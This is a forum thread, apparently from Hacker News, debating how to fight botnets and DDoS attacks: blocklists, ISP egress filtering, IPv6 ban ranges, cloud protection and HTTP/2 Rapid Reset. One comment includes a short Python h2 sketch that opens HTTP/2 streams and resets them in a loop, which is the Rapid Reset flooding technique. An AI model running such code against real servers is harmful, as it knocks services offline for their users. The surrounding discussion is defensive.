ISPs will gladly quarantine/rate-limit folks for pirating stuff; why don't they use those tools to combat botnets? Though I could see this leading down a slippery slope to remote attestation for internet access.


> why don't they use those tools to combat botnets?

Because they probably don't care.


Community, yes. Government protection, no. When was the last time you heard of police stopping a break-in or completing a successful investigation?

Independent of police, in bad communities your neighbors are willing to break in. In good communities they aren't.


Where this breaks down is that because of the nature of the internet and DDoS attacks it’s not something that can easily be solved with better policing - even identifying a perp might be near-impossible, and they might be in another country anyways. The government does try to prosecute botnets and DDoS attacks today, but it’s of limited success. Is there a practical solution here I’m missing?


I don't know about a "practical solution", but there are research efforts to think about new ways to build internets that mitigate some of these problems.

Here is one that I'm aware of: https://named-data.net


Why don't we just require major providers to publish a realtime list of IPs that are attacking, so that we can drop them into a block list with an expiration date of a month or so?

If your computer is infected, I don't want to talk to you for a month. If it continues to be infected, I might up that to a year, or permanently ban you.

It's your problem. Go fix it.
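
Mechanically that's just a map with expiry timestamps. A toy sketch (the 30-day/1-year escalation is the policy I described above, not any standard):

    import time

    DAY = 86400
    blocklist = {}  # ip -> (expiry, strikes)

    def report_attacker(ip: str) -> None:
        _, strikes = blocklist.get(ip, (0, 0))
        strikes += 1
        ttl = 30 * DAY if strikes == 1 else 365 * DAY  # escalate repeat offenders
        blocklist[ip] = (time.time() + ttl, strikes)

    def is_blocked(ip: str) -> bool:
        expiry, _ = blocklist.get(ip, (0, 0))
        return time.time() < expiry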


I've been on the receiving end of "Your" (dynamic) "IP has been blocked."

I would greatly prefer not having my semi-randomized IP blocked because someone used it maliciously a year ago.


Key phrase: "a year"

If anybody is suggesting permanent bans of IPs, it's not me, at least not at a public level. I may very well choose privately to do that.

To clarify: I, personally, choose a blacklist policy. Not some other org. I think if you offload this onto any kind of external structure, it breaks again.

ADD: We make publicly available, second by second, how the internet is broken, and invite all comers, including me and my blocklist, to help fix it.

There's a huge commercial interest in NOT fixing the problem of random crap showing up, from dancing cats selling things to targeted inserted ads. I get it. We saw this same thing happen with adblockers. It's now going on with "free" VPNs. Can't fight that perverse incentive, so don't fight it.


Thing is, I don’t care.

The problem is that ISPs whose customers are originating the attacks from don’t give a shit.

If we have to give up 1% of legitimate traffic to thwart 90% of attacks, it is a good deal.

If you and other customers complain to your ISP (or switch), eventually they’ll do something about it.

We can’t seriously keep on accepting that « thousands of compromised devices » is a fine reality for a « small botnet ».

These devices should be quarantined.


Sounds like a really great way to potentially destroy someone's career if they aren't terribly competent and you are. Infect some component in their home network that they don't even know is smart-enabled, and keep breaching their new devices, adding them to an active and conspicuous botnet. The only recourse for the average Joe is to find expert help, which isn't really in abundant supply if you're up against a semi-sophisticated malicious actor.

I don't even want to think about the ramifications for small and medium sized businesses. Realistically, how much would it cost to completely destroy a local competitor by paying someone to orchestrate a few events in succession?


This is an odd argument. The net is currently broken in many ways. One of the many ways is fake negative reviews. They easily destroy small businesses.

As I understand your argument, because the net has solid endpoints we can identify and isolate, we should ignore that fact. Instead we should create more and more complex systems to work around bad actors?

Bad actor takes control of grandma's computer. We should do all sorts of things except stop talking to grandma's computer? The thing, I would suspect, that most people would expect?

Businesses suffer from too much transparency. Got that part. They buy things that don't work and sometimes hurt people, even if they don't intend to. So far, so good. Where is the part where new business models are supposed to exist because some people made bad choices and the current models don't work? Why don't we just publicize the bad choices and let things work themselves out?

Sorry. Missing it.


Amazon definitely cares if they lose 1% of sales.

Guess who has more votes, you or Amazon.


I’m aware. Doesn’t make it sting less being on the receiving end of attacks all the time and seeing everyone collectively shrug.


Ok, that is somewhat fair.

My personal want / solution would simply be: "everything gets an IPv6 address, and IPv4 gets deprecated. Everything using IPv4 gets an algorithm slapped on top to convert it into IPv6."

Dynamic IPs become a thing of the past.

But I realize that is significantly easier said than done. (Makes Minecraft servers easier to set up, though.)


"Moreover, the lifespan of a given IP in a botnet is usually short so any long term mitigation is likely to do more harm than good." "As we can see, many new IPs spotted on a given day disappear very quickly afterwards." https://blog.cloudflare.com/technical-breakdown-http2-rapid-...


Great solution for a world without shared and dynamic IPs.


Not as bad as one may think. It's proper feedback which can be acted upon.

Every reasonable connectivity provider would pay attention to this info, or face intense complaints from its users with shared and dynamic IPs. It would identify sources of attacks, and block them at higher granularity level, reporting that the range has been cleared. (If a provider lied, everyone would stop believing it, and the disgruntled customers would leave it.)

For shared hosting providers it would mean blocking specific user accounts using a firewall, notifying users, and maybe even selling cleanup services.

For home internet users, it also would mean blocking specific users, contacting them, helping them identify the infected machine at home.

It would massively drive patching of old router firmware which is often cracked and infected. Same for IoT stuff, infected PCs, malicious apps on phones, etc. There would be an incentive to stay clean.


If the one doing the blocking is not at FAANG, it would do nothing of the sort. And FAANG benefit from DDoS by getting people into their walled cloud gardens.


Funny man thinks the big ISP cares that you blocked your own site from your own customers coming from the big ISP's network.


No; with shared hosting, somebody else manages to blacklist the IP that serves many paying customers.


Block the whole subnet and make it the ISP's problem?


It's interesting to me that most of the push-back so far has been about the business model of the internet, i.e. people need link traversal and content publishing in order to make money from advertising (implied, but not stated). Therefore we need to add yet another layer to the mix, the cloud providers, and start paying those guys.

And yes, we can block entire subnets. You own the IP addresses; you're responsible for stuff coming out of them, at least to the degree that it's not malicious to the web as a whole (but not for the content itself, of course).

I'm calling bullshit on these assumptions. The internet is a communications tool. If it's not communicating, it's broken. If you provide dynamic IPs to clients that attack people, you're breaking it. It's not my problem or something I should ever be expected to pay for.

To be clear, my point is that we're suggesting yet another layer of commercial, paid crap on top of a broken system in order to fix it. It'd be phenomenally better just to publicly identify the places and methods where it's broken and let folks with more vested interests than information consumers worry about it. Hell, I'm not interested in paying for the busload of bytes I'm currently consuming for every one sentence of value I receive.


Because when a single machine is infected, at one ISP, it's a good idea to block the whole subnet? I don't think any commercial activity could afford such a security strategy, blindly blocking legit users by the thousands.


So it’s the ISP’s fault that my grandma never met a spam email that she didn’t want to click?

One of the things that gets lost in this kind of debate is that the vast, vast majority of Internet users are not experts in how the Internet, computers, or their phones work. So expecting them to be able to "just not get exploited" is a naive strategy and bringing the pain to the ISP feels counterproductive because what, realistically, can they do to stop all of their unsophisticated users from getting themselves exploited?

At the end of the day, the vast majority of the users of the Internet do not care how it works - they want their email, they want their cat videos, and they want to check up on their high school ex on Facebook. How can we rearchitect the Internet to be a) open b) privacy protecting, and c) robust against these kinds of attacks so that the targets of DDOS attacks have better protection than paying a third party and hoping that that third party can protect them?


How does the ISP solve it? Send a mass mail/email telling people to reset their devices because someone has a device with botnet malware?


That is their problem. Maybe the price needs to go up if you don't secure all your devices, since the ISP is going to send a tech to your house. Or maybe the ISP has deep enough pockets to find and sue those cheap IoT device makers for not being secure, thus funding their tech support team.


Egress filtering? A botnet DDoS stream should not look like normal network traffic...


> Sorry citizen, Google services are inaccessible because the only ISP in your city sold a service to a bad actor.

> We might fix this, we might not; you DON'T have a choice.

> Thank you for your continued business.


Indistinguishable from the kind of service I get from Google - the moment that I need a human involved I just close my account with whatever Google service is misbehaving and move on.


But you have other options, which is my point.

(swap in any corpo-service provider you personally like the most)

Blanket banning subnet ranges from services because of the actions of someone else is 3rd world shit.


Hacker News nerds will argue all day long that the Internet is a utility when the argument happens to personally benefit them, then in the same breath say that a random network admin is justified in blocking a whole ISP subnet due to one “bad” actor. And of course by bad actor I mean person that almost certainly accidentally got themselves infected with malware by not understanding the completely Byzantine world of computers and the Internet.


Well, if someone had somehow gotten their house wires damaged in a way that causes brownouts to neighbours, wouldn't the electric company be justified in cutting off the house?


I'm sure Comcast is terrified that their users won't be able to read my blog.


You are quite obviously speaking from the perspective of someone who wouldn't be in a position to be making these calls.


Banning a large number of customers for an entire month doesn't make economic sense; it'll be cheaper to just pay a big cloud provider for protection.

(not to mention the number of false positives you'd get, etc etc)


And now some of your services don't work because you blocked an IP that turned out to be a cloud-service IP reused for a legit service.


I propose to make a special "reject" packet. When a host, let's say 1.1.1.1, sends such a packet to 2.2.2.2, all providers that see this packet MUST reject any traffic from 2.2.2.2 to 1.1.1.1. This is very easy but very efficient, and allows a single host to withstand an attack of any size.

There is no need for any central authority and no need to maintain any lists.


And then that can be abused...


No, it cannot. It is well thought out.


There are 2^128 IPv6 addresses.

If you store 1 bit (banned/unbanned) + a unix timestamp (ban expiration) for each of those IPs, that requires more storage space than exists, many billion times over.

To store such a block table you propose would require more memory for routers than any router has ever had and ever will have.

An attacker could easily "flush" all entries in this table by, for example, banning a TB of IPv6 addresses from talking to them, surely resulting in all participating routers dropping other bans to store some of those.


We can store an IP address with a mask (banning subnets instead of separate addresses). Also, IPv6 is so rarely used that I would ban the whole address space for the duration of an attack.

For example, if an attack is coming from a country where you don't have many paying customers, but where there are many infected devices due to the use of pirated, outdated software, it is easier to ban the whole country than to figure out who is infected and who is not.


> An attacker could easily "flush" all entries in this table by, for example, banning a TB of IPv6 addresses

We can set a limit on the number of ban records per host to prevent that.


Ban the entire /64. If banning the /64 is not enough, then ban the /48. If that is not enough, keep going up 4 bits until it is (most IPv6 allocations line up on a nibble boundary, hence the 4 bits).
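
Python's ipaddress module makes the nibble-walk easy to picture (purely illustrative):

    import ipaddress

    net = ipaddress.ip_network("2001:db8:abcd:1234::/64")
    while net.prefixlen > 48:
        net = net.supernet(prefixlen_diff=4)  # widen by one nibble
        print(net)
    # 2001:db8:abcd:1230::/60
    # 2001:db8:abcd:1200::/56
    # 2001:db8:abcd:1000::/52
    # 2001:db8:abcd::/48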


That actually sounds like a really good idea. This is already implemented in the physical world (in a much less efficient way) in the form of “no spam” stickers and registrations.

Is there a reason other than inertia for why it hasn’t been implemented?


The main problem is: how do you authenticate the request as legitimate? It's already possible to spoof headers and the source IP (in fact, major DDoS attacks use exactly this in reflection attacks: spoof a DNS request as coming from 1.1.1.1 and get a much larger response sent TO 1.1.1.1 from wherever).


You can send back a reply with a token to confirm the ban.
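
Something like a return-routability check: only install the ban once the purported sender proves it can receive traffic at that address. A rough sketch (message format and transport are invented for illustration):

    import secrets, time

    pending = {}    # token -> (requester_ip, banned_ip, issued_at)
    banned = set()  # (banned_ip, requester_ip) pairs to drop

    def send_to(ip, msg):
        print(f"-> {ip}: {msg}")  # stand-in for the actual wire protocol

    def on_reject(requester_ip, banned_ip):
        # Never trust the packet's source address outright; challenge it.
        token = secrets.token_hex(16)
        pending[token] = (requester_ip, banned_ip, time.time())
        send_to(requester_ip, {"type": "challenge", "token": token})

    def on_confirm(sender_ip, token):
        entry = pending.pop(token, None)
        if entry and entry[0] == sender_ip and time.time() - entry[2] < 30:
            banned.add((entry[1], entry[0]))  # a spoofer never sees the token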


ISPs do not want to spend money fighting criminals.


That doesn’t sound convincing to me. I mean I understand they don’t want to spend money but if cost is the only barrier it seems like that could be overcome somehow by interested parties.


It's not the costs, it's that some ISPs like getting money from spammers and criminals, and carefully look the other way.

And the other ISPs like getting paid for DDoS mitigation, so they also look the other way. There's no money to be made fixing the underlying problem.


That would be giving away some of the secret sauce on the part of the cloud providers. They are selling security as (part of their) service. There are some community-shared lists of botnets, of course, but they may not be very real-time or up to date.


You're assuming that identification of attack traffic is 100% correct, which is unfortunately not the reality.


Nothing "forces botnets to up their game", they just want to make money (or in some cases, "watch the world burn"); I don't see how any coordination whatsoever would diminish these motivations.


So the email spam solution? Doesn't that come with its own list of problems?

Also, a stupid question from someone not that familiar with DDoS: can't you flood the target with requests even if the source address will be rejected? Or even if the IP packet has a falsified source address?


Yes.


It's worth noting that features like the one that enabled Rapid Reset are pushed into standards by the exact same companies, because they are needed for performance at their scale.

So in a way this was partially caused by the existence of insanely big tech companies that need such features.


Maybe I misunderstood the issue, but it sounds like Rapid Reset was not the cause.


Rapid Reset is the name given to the technique behind the attack. The cause is a flaw in HTTP/2 stream multiplexing that enables this technique.
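
Roughly, the client side of the technique looks like this (a sketch using the Python h2 library; real attacks do this in a tight loop over raw sockets):

    import h2.connection

    conn = h2.connection.H2Connection()
    conn.initiate_connection()
    headers = [(":method", "GET"), (":path", "/"),
               (":scheme", "https"), (":authority", "example.com")]

    # The flaw: HEADERS followed by an immediate RST_STREAM costs the client
    # almost nothing, but the server has already begun processing the request,
    # and the cancelled stream no longer counts against MAX_CONCURRENT_STREAMS.
    for stream_id in range(1, 201, 2):              # odd IDs: client-initiated
        conn.send_headers(stream_id, headers)
        conn.reset_stream(stream_id, error_code=8)  # 0x8 = CANCEL
    payload = conn.data_to_send()                   # bytes to write to the TLS socket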


The actual solutions are:

1) Egress filtering by the ISPs

2) Better malware resistance and vulnerability mitigation on easily-compromised appliance and IoT devices

But neither is going to happen. 1 is a coordination problem. It has to be all or nothing, which can only be compelled by law, and we have no global laws and no global law enforcement mechanism. Some countries inevitably don't care and the rest won't partition the entire Internet by permanently cutting them off. 2 would probably make the entire Internet of Things and a whole lot of home computing just not happen because it isn't economically feasible. Poor security effectively acts as a tacit tax. We all pay a little bit each, but the tax is collected by criminals instead of governments.

Note that even your proposed solution here only works if 1 happened. Otherwise, source IP spoofing easily defeats a blocklist.
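
For what (1) would look like in principle: drop any outbound packet whose source address was never allocated to you. A sketch in Python for clarity (the prefixes are documentation ranges; a real ISP does this in hardware at line rate):

    import ipaddress

    # BCP 38-style egress filter.
    OUR_PREFIXES = [ipaddress.ip_network(p)
                    for p in ("203.0.113.0/24", "2001:db8::/32")]

    def should_forward(src_ip: str) -> bool:
        """Forward only packets whose source address we actually allocated."""
        addr = ipaddress.ip_address(src_ip)
        return any(addr in net for net in OUR_PREFIXES)

    print(should_forward("203.0.113.7"))  # True: legitimately ours
    print(should_forward("8.8.8.8"))      # False: spoofed source, drop it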


The problem with this type of attack is that you can't really catch it with MITM-style DDoS protection.

You're not seeing any SYN flood, just a bunch of TCP connections (the equivalent of, say, a search crawler), all of them encrypted. Only after decryption on the load balancer do they become visible as single TCP streams each sheltering thousands of HTTP/2 streams.


For a side hobby of mine (writing), I imagine what would happen if current trends continued. Thus, big caveat: these are all just thought experiments, not realistic predictions of any kind.

For this particular scenario, the public Internet would get so bad ("enshittified") that people would tend to leave it alone. For essential public services, governments would set up their own networks disconnected from the Internet, where all devices and their connections must be authenticated to a person or corporation[^1]. Maybe something equivalent would exist for corporations and to enable e-commerce.

[^1] China works like this already, to a high degree.


Have you heard of New IP? It's the Huawei/Chinese plan to reform the Internet that keeps getting criticized for a variety of reasons. I haven't had the time to read the proposals properly, but the part about building trust directly into the network seems like it could solve this problem, at a price.

> Having security and trust be “intrinsic” to the network will require core layers to carry metadata about the users, applications and services being transported. If users need to register in order to have packets sent to their destination, the result is that network operators, and those who license the operators, can remove individual users’ access at any time.

https://dnsrf.org/.k-media/d3c1d810de1e98bdf7af7aa52406e837.... (critical of the proposal)


I've witnessed a few sustained (hours- or days-long) DDoS attacks that were straight-up extortion: owners were contacted with "give us money or we will keep your site offline".

Most of the time I see attacks lasting 15-20 minutes. I assume it's either someone doing it "for the lulz" or some cyber-warfare outfit testing their big guns.

I always consider the possibility of someone using a DDoS to mask a more sophisticated attack.


Plenty of even quite-large websites just don't get attacked by DDoS attacks, because nobody has any particular reason to attack them.


You’re completely wrong.

All large sites regularly get attacked.

The average skiddie’s motivation is boredom. So they DoS a site they use regularly, just to see.

Heck, they generally don’t even mean to cause damage per se; they just think it’s a funny use of their evening.

You have to stop thinking DoS attacks are always particularly personal. They really often just aren’t, and it’s a monumental pain in the ass to be on the receiving end.


I run boring sites like government websites which say what kinds of recycling go in which color trash cans.

Well used, but never attacked.


Well, lucky you. Or unlucky me and everyone I know running a large website. Guess we’ll never know.


A spamhaus-like blacklist for botnet IPs is an interesting idea.

What if Google and Cloudflare collectively reverse-DoSed all the infected IPs, not by sending them any traffic, but simply by refusing to accept any connections from them to any part of their infrastructure?

Whoever is on those IPs will suddenly find that half the internet doesn't work anymore. Which is probably a good enough incentive for them to replace their router, format their PC, or whatever else is necessary to disinfect themselves.

In many parts of the world, landline IP allocations tend to be stable enough for this to have a real effect. Phones are a different story, but phones are also much less likely to be useful in a DDoS botnet. (The owner would immediately notice the sudden heat and data usage.)

If we're going to live in a world where a small number of companies own half the internet, at least they could use their power to do some good.


Google already does this. "Something on your network is causing unusual traffic, please fill in this captcha to continue".

And then you have to fill in a new captcha every 5 minutes or so just to keep using google maps/gmail/search.

It's kinda annoying, and usually the culprit is someone else who shares my IP, not me (i.e. a school, university, workplace, or open wifi).


For any Googlers reading: this behaviour sometimes hits an AJAX request (map data downloads when panning or zooming). The client-side JavaScript then fails badly, and the user sees a broken site rather than a captcha request.

Plz fix.


We don't need to share a block-list, but yes, blocking all traffic from open proxies (which nearly all the large attacks of the 2020s have used) is definitely part of the long-term plan. Any legitimate users of those proxies will experience some short-term pain, but they'll patch and life will go on.


> In many parts of the world, landline IP allocations tend to be stable enough for this to have a real effect.

And what about CGNAT?


In that scenario, it's on the ISP to clean their network of abuse, the same thing they would need to do if Gmail had blacklisted their IPs for spamming. After all, an ISP that can't connect to YouTube isn't going to stay in business for long.

People have been begging ISPs for ages to do a bit of egress filtering, for example, to prevent source address falsification. They've demonstrated time and again that they don't give a crap unless it affects their bottom line.


OK, but how should an ISP distinguish a good HTTP/2 connection from a bad one (I'm talking about this particular attack)? As far as I can tell, the DoS starts after the connection from bot to server is established, at which point the connection is fully encrypted. Should all ISPs MITM their clients to ensure that all traffic is good and proper?


Ever had your droplet suspended for using a vulnerable WordPress plugin?

Your droplet suddenly tries to log into somebody else's server 10 times a second. The target of the attack complains to DigitalOcean, "hey, one of your customers is trying to hack me!" and attaches a log of the login attempts. DigitalOcean assumes that the report was made in good faith, forwards it to you and immediately suspends your droplet. It won't be reactivated until you reply with evidence that you have at least tried to clean up the problem. If it happens again, you won't get off so easily.

I suppose a similar system, in a more real-time fashion, could be set up between the maintainers of the blacklist (Google, Cloudflare, Amazon, etc.) and the ISPs. No need for the ISPs to sniff everyone's traffic if they can rely on good-faith reports straight from the horse's mouth that somebody on port 52384 of 11.22.33.44 is DDoSing a Google property. Even with CGNAT, the port plus a timestamp will identify the customer responsible.
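
For the CGNAT case, that only works if the report includes a timestamp and the ISP retains NAT translation logs; the lookup itself is trivial (everything here is hypothetical):

    # Hypothetical CGNAT log: (public_ip, public_port, start, end, subscriber)
    nat_log = [
        ("11.22.33.44", 52384, 1700000000, 1700000600, "subscriber-9871"),
    ]

    def who_was_it(ip, port, when):
        for pub_ip, pub_port, start, end, subscriber in nat_log:
            if (pub_ip, pub_port) == (ip, port) and start <= when <= end:
                return subscriber
        return None  # logs expired or never kept: attribution fails

    print(who_was_it("11.22.33.44", 52384, 1700000300))  # subscriber-9871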


Proliferation of low-cost computing is the cause of this, not big players being able to mitigate it.

This is not coming from "known botnet IPs"; it's coming from random infected devices. Some aren't even doing it constantly, just one request per device per day; the botnet is already large enough to cause issues.


We could also treat it as a public security threat and act accordingly.


I think this is the key takeaway. Unfortunately, world leaders are not tech-savvy enough to even consider this a threat.


Yet. But we're getting there.


Which jurisdiction are you referring to with “we”?


Any that matters, I guess ("we" as in the collective of people).


> I'd really wish for them to come through some community coordinated list of botnet infected IPs or something.

The problem is that IP addresses are not a reliable identifier, especially for the kinds of folks whose routers have been infected by malware. Few ISPs hand out static IP addresses anymore. It's why online games no longer bother with IP bans: as soon as the target reboots their router they evade the ban, and some other poor sap on the same ISP gets stuck with the flagged IP.


DDoS attacks were growing in size and frequency before these companies started creating products to address them. They took down sites, demanded ransom, and cost a lot of money in lost business and hosting bills.

If you want to complain about an actual working solution, that's your right, but realize that without an alternate solution you're advocating for giving small gangs the ability to disrupt everyone else's lives on a whim.


This is akin to the argument that bike helmets make people less safe (which invariably comes with a comment about the Dutch and their safety record).


It is like saying effective spam filters are bad for email as a distributed system.

It's the spam that killed email, not the filters.


It’s a prisoner’s dilemma! The only way to win is for both service providers and “bad people” not to escalate. That’s not going to happen.


The typical way of dealing with "bad people" is to subject them to the criminal justice system (or vigilantism if the problem is bad enough and the criminal justice system is inadequate). This tends to reduce, but not eliminate, the misbehaving.

Improving the ability to track down and prosecute perpetrators tends to result in less anonymity/privacy, so that makes the problem challenging.

Thinking in the long/very-long term, we need to get more innovative with the underlying technology to mitigate abuse. I mentioned this effort https://named-data.net in another part of the thread.


>but I'd really wish for them to come through some community coordinated list of botnet infected IPs or something.

Using any kind of community-coordinated IP ban is useless and would hurt a lot of people; millions (or even billions) of devices have dynamic IP addresses.

You would not stop botnets from DDoSing you, and on top of that you'd block millions of legitimate users.


Do you remember the pre-DDoS-mitigation days? Botnets could easily bring down major, important sites and make them unavailable to users. This caused monetary loss and, depending on the site, could even cost lives. How is that previous state better than, well, not suffering from these problems?


> pay Google, Amazon or Cloudflare a protection tax.

Just FYI: Hetzner offers free DDoS protection: https://www.hetzner.com/unternehmen/ddos-schutz

I'm sure other hosting companies also offer it.


That doesn't really work for this type of attack:

> In this final layer, we filter out attacks in the form of SYN floods, DNS floods, and invalid packets. We are also able to flexibly adapt to other unique attacks and to reliably mitigate them.

Which means any legitimate HTTP/2 connection will go through just fine.

Even if that connection then spawns hundreds of substreams.

The push for an end-to-end encrypted internet also means you can't really stop more advanced attacks. You could have just a few dozen hosts doing 20-30 connections each (i.e. "looking perfectly normal" to the DDoS protection provider) while generating tens of thousands of HTTP/2 streams per second.

I'm speaking from the experience of mitigating an attack like this. Our DDoS provider was near-useless.
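
The arithmetic behind those numbers (illustrative only):

    hosts = 40               # "a few dozen" machines
    conns_per_host = 25      # 20-30 TCP connections each, crawler-like
    streams_per_second = 20  # HTTP/2 streams opened per connection per second
    print(hosts * conns_per_host * streams_per_second)  # 20000 requests/s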


For higher-layer attacks you need something like the "modified cryptominer in the browser" approach that Cloudflare and friends use now: those interstitial pages that pop up for a few seconds are doing mathematical hashing to burn processor time on your end, which greatly complicates the ability to DDoS.
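
Those interstitials are essentially hashcash-style proof of work; a minimal sketch of the idea (difficulty and challenge format invented for illustration):

    import hashlib, itertools

    def solve(challenge: bytes, difficulty: int = 16) -> int:
        """Find a nonce whose SHA-256 hash has `difficulty` leading zero bits."""
        target = 2 ** (256 - difficulty)
        for nonce in itertools.count():
            digest = hashlib.sha256(challenge + str(nonce).encode()).digest()
            if int.from_bytes(digest, "big") < target:
                return nonce  # costly to find on average, one hash to verify

    # The server checks the answer with a single hash; the client burned
    # roughly 2**difficulty attempts, which is what throttles a botnet.
    print(solve(b"session-token-xyz"))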


Only for small DDoS attacks; for larger ones they disable routing for your IP address. I guess they don't have the capacity to handle the really big DDoS attacks nowadays.


Yep, and null-routing your IP is exactly what providers did in the days GP is longing for, and still do, especially outside of the big cloud providers.


> The fact that large cloud providers can handle huge DDoS attacks I think in the long run leads to a worse internet

Don't agree.

> the only solutions available are to pay Google, Amazon or Cloudflare a protection tax.

It's not.

> come through some community coordinated list of botnet infected IPs

How would that help?


A protection tax? You realize that DDoS protection costs the providers real money?


Yes, but cloud providers spread that protection cost across all their customers. Someone hosting their own website needs the same level of protection just for themselves.

DDoS protection is really the only thing you can't provide yourself on your own machines on today's internet.


I don't think they do. There are a variety of DDoS attacks that require more expensive computation to detect.


Leave it to HN to find the fly in the ointment when Google is mentioned.


In fewer words: it's DDoS attackers that make the internet a worse place.


Just like law enforcement forced criminals to up their game, so the only option we have is to pay taxes?

Well, I wrote this comment to ridicule yours... but actually, that is what happened.


> Cloudflare a protection tax

$NET gives away DDoS protection for free to non-businesses


I smell what you're stepping in here, but I grow more comfortable with the idea of big conglomerates continuing to improve their attack mitigation efforts on behalf of their locales when I compare this to the concept of vaccines.

Vaccines inevitably lead to stronger viruses, but would you argue we should go back and never have begun to use them?

Cloudflare and Google may be some sites' only hope of staying alive in the event of network-driven attacks. I suppose this landscape is a double-edged sword.


[flagged]


There is Marek's disease, so you still need to show that GP is in the wrong.


One is about machines on the internet serving images and forum posts. This comment is low-quality and is a form of name-calling.


I was writing it with "using antibiotics in absolutely every mundane product causes superbugs" energy, actually, which is something that really is a problem.



